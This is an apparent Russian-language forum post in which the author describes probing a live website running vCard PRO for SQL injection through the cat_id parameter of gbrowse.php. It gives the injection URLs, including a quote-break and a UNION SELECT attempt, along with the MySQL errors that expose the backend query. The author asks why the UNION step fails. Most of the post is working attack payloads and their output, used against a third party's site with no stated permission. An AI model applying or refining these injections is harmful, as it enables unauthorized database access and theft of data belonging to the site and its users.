нарыл на сайте одном, такое, в урле пишешь так: e-cards/gbrowse.php?cat_id=3' выдает такое: ---------------- Database error in vCard PRO: INVALID SQL: SELECT * FROM vcard_cards WHERE cat_id='3'' AND card_active='1' ORDER BY card_caption mysql error: You have an error in your SQL syntax near '1' ORDER BY card_caption ' at line 1 mysql error number: 1064 ---------------- вприницпе уже могу инъектировать, работает если вписывать LIMIT, ORDER BY решил проверить на UNION SELECT, вписать по аналогии: e-cards/gbrowse.php?cat_id=3' UNION SELECT * FROM vcard_cards/* мне кажется должен выдать два запроса, но даёт ошибку: ------------------ INVALID SQL: SELECT * FROM vcard_cards WHERE cat_id='3' UNION SELECT * FROM vcard_cards/*' AND card_active='1' ORDER BY card_caption mysql error: You have an error in your SQL syntax near 'UNION SELECT * FROM vcard_cards/*' AND card_active='1' ORDER BY card_caption ' at line 1 mysql error number: 1064 ----------------- пробовал делать объединенный запрос делать из другой таблицы, с перебором кол-м столбцов после SELECT ошибка всегда аналогичная выходит. может там старый MySQl стоит и не потдерживает UNION?